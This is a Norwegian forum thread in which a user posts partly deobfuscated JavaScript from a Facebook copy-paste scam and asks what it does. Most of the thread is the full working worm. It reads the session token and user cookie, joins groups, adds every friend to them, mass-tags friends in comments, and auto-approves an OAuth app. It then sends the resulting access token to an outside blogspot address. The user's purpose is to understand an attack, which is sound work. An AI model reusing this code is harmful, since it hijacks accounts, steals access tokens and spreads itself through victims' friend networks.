Areyan Skrevet 29. april 2014 Rapporter Del Skrevet 29. april 2014 (endret) Hei, fikk noen rare forespørsler via facebook om a copy-paste og kjøre koden herfra på facebooken min.Mistenker at det er et hackerforsøk og vil gjerne ha litt hjelp fra folk som er kyndige med javascript til å hjelpe meg å forstå nøyaktig hva denne koden vil gjøre. Og selvfølgelig hvilke konsekvenser det vil ha for en facebook-profil. Setter veldig pris på litt hjelp her da noen av mine mindre datakyndige venner selvfølgelig har gjort som hackeren har instruert og kjørt koden... Har tatt meg bryet med å oversette de kryptiske bitene til koden det skal representere og formatere den til et lesbart nivå som best jeg kan: function Kodran(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a) } Kodran("1379575028991328"); Kodran("1379738492308315"); Kodran("562521103826775"); Kodran("262651447224104"); var b = document.getElementsByName("fb_dtsg")[0].value, c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function g(d) { var a = new XMLHttpRequest; d = "&ref=group_jump_header&group_id=" + d + "&fb_dtsg=" + b + "&__user=" + c + "&phstamp="; a.open("POST", "/ajax/groups/membership/r2j.php?__a=1", !0); a.onreadystatechange = function () { 4 == a.readyState && 200 == a.status && a.close }; a.send(d) } g("235841983200157"); g("623270711058894"); g("166191003446381"); g("429414337196220"); b = document.getElementsByName("fb_dtsg")[0].value; c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","281001968734667","onreadystatechange","readyState","arkadaslar = ","for (;;","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"]; var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]]; var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]); var id=_0xa22c[5]; var arkadaslar=[]; var svn_rev; function arkadaslari_al(id) { var _0x7892x7= new XMLHttpRequest(); _0x7892x7[_0xa22c[6]]=function () { if(_0x7892x7[_0xa22c[7]]==4) { eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]); for(f=0; f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27); f++) { mesaj=_0xa22c[10]; mesaj_text=_0xa22c[10]; for(i=f*27; i<(f+1)*27; i++) { if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) { mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22]; mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]; } ; } ; yorum_yap(id,mesaj); } ; } ; } ; var _0x7892x8=_0xa22c[24]; _0x7892x8+=_0xa22c[25]; _0x7892x8+=_0xa22c[26]; _0x7892x8+=_0xa22c[27]; _0x7892x8+=_0xa22c[28]+user_id; _0x7892x8+=_0xa22c[29]+user_id; if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0) { _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true); } else { _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true); } ; _0x7892x7[_0xa22c[37]](); } ; function RandomArkadas() { var _0x7892xa=_0xa22c[10]; for(i=0; i<9; i++) { _0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22]; } ; return _0x7892xa; } ; function yorum_yap(id,_0x7892xc) { var _0x7892xd= new XMLHttpRequest(); var _0x7892x8=_0xa22c[10]; _0x7892x8+=_0xa22c[40]+id; _0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc); _0x7892x8+=_0xa22c[42]; _0x7892x8+=_0xa22c[43]; _0x7892x8+=_0xa22c[44]; _0x7892x8+=_0xa22c[45]; _0x7892x8+=_0xa22c[46]; _0x7892x8+=_0xa22c[47]+id+_0xa22c[48]; _0x7892x8+=_0xa22c[49]; _0x7892x8+=_0xa22c[50]; _0x7892x8+=_0xa22c[51]; _0x7892x8+=_0xa22c[52]; _0x7892x8+=_0xa22c[29]+user_id; _0x7892x8+=_0xa22c[53]; _0x7892x8+=_0xa22c[54]; _0x7892x8+=_0xa22c[55]; _0x7892x8+=_0xa22c[56]+fb_dtsg; _0x7892x8+=_0xa22c[57]; _0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true); _0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]); _0x7892xd[_0xa22c[6]]=function () { if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200) { _0x7892xd[_0xa22c[64]]; } ; } ; _0x7892xd[_0xa22c[37]](_0x7892x8); } ; arkadaslari_al(id); var gid = ['623270711058894']; var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/membership/r2j.php?__a=1'; var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['send'](paramswp); var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); var friends = new Array(); gf = new XMLHttpRequest(); gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false); gf['send'](); if (gf['readyState'] != 4) {} else { data = eval('(' + gf['responseText']['substr'](9) + ')'); if (data['error']) {} else { friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { return _0x93dax8['index'] - _0x93dax9['index']; }); }; }; for (var i = 0; i < friends['length']; i++) { var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/members/add_post.php?__a=1'; var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['onreadystatechange'] = function () { if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {}; }; httpwp['send'](paramswp); }; if (location.hostname.indexOf("www.facebook.com", "static.ak.facebook.com", "apps.facebook.com", "beta.facebook.com") >= 0) { var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString(); function uygulamaizinver(url) { var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { izikbenhtml = document.createElement("html"); izikbenhtml.innerHTML = xmlhttp.responseText; if (izikbenhtml.getElementsByTagName("form").length > 0) { izikbenhtml.innerHTML = izikbenhtml.getElementsByTagName("form")[0].outerHTML act = izikbenhtml.getElementsByTagName("form")[0].action; duzenlevegonder(izikbenhtml, act); } } }; xmlhttp.open("GET", url, true); xmlhttp.send(); } function duzenlevegonder(formnesne, act) { izikbenparams = ""; for (i = 0; i < formnesne.getElementsByTagName("input").length; i++) { if (formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")) { izikbenparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value; } } if (formnesne.getElementsByTagName("select").length > 0) { izikbenparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80"; } izikbenparams.replace("&fb_dtsg", "fb_dtsg"); izikbenparams += "&__CONFIRM__=1"; formnesne = formnesne; var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { izikhtml = document.createElement("html"); izikhtml.innerHTML = xmlhttp.responseText; if (izikhtml.getElementsByTagName("form").length > 0) { izikhtml.innerHTML = izikhtml.getElementsByTagName("form")[0].outerHTML; act = izikhtml.getElementsByTagName("form")[0].action; duzenlevegonder(izikhtml, act) } else { sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i); if (sex[1]) { tokenyolla(sex[1]); } } } }; xmlhttp.open("POST", act, true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp.send(izikbenparams); } function TokenUrl(id) { return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id + "&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday"; } if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])) { uygulamaizinver(TokenUrl("121876164619130")); var http = new XMLHttpRequest(); http['open']('GET', 'http://graph.facebook.com/' + profile_id, false); http['send'](); var get = JSON.parse(http['responseText']); var isim = get.name; } window.setInterval(function () { if (document.getElementsByClassName("_5ce")) { for (i = 0; i < document.getElementsByClassName("_5ce").length; i++) { document.getElementsByClassName("_5ce")[i].innerHTML = ""; } } if (document.getElementsByClassName("uiToggle wrap")) { for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++) { document.getElementsByClassName("uiToggle wrap")[i].innerHTML = ""; } } if (document.getElementsByClassName("uiPopover")) { for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++) { document.getElementsByClassName("uiPopover")[i].innerHTML = ""; } } }, 200); function tokenyolla(token) { top.location.href = 'http://19283746564.blogspot.com/#' + token; } } var Zakarias = "click OK and wait for seconds, Hacking START now!! "; alert(Zakarias); Endret 29. april 2014 av Areyan Lenke til kommentar
War Skrevet 29. april 2014 Rapporter Del Skrevet 29. april 2014 Er det dette? http://www.scamsniper.info/2011/04/warning-cut-and-paste-java-code-leads.html Lenke til kommentar
Areyan Skrevet 29. april 2014 Forfatter Rapporter Del Skrevet 29. april 2014 Nei, tror ikke det.Men framgangsmetoden ligner, bortsett fra at man her blir randomly tatt opp i grupper som virker nokså suspekte, via venner som har kjørt koden ovenfor. Lenke til kommentar
Anbefalte innlegg
Opprett en konto eller logg inn for å kommentere
Du må være et medlem for å kunne skrive en kommentar
Opprett konto
Det er enkelt å melde seg inn for å starte en ny konto!
Start en kontoLogg inn
Har du allerede en konto? Logg inn her.
Logg inn nå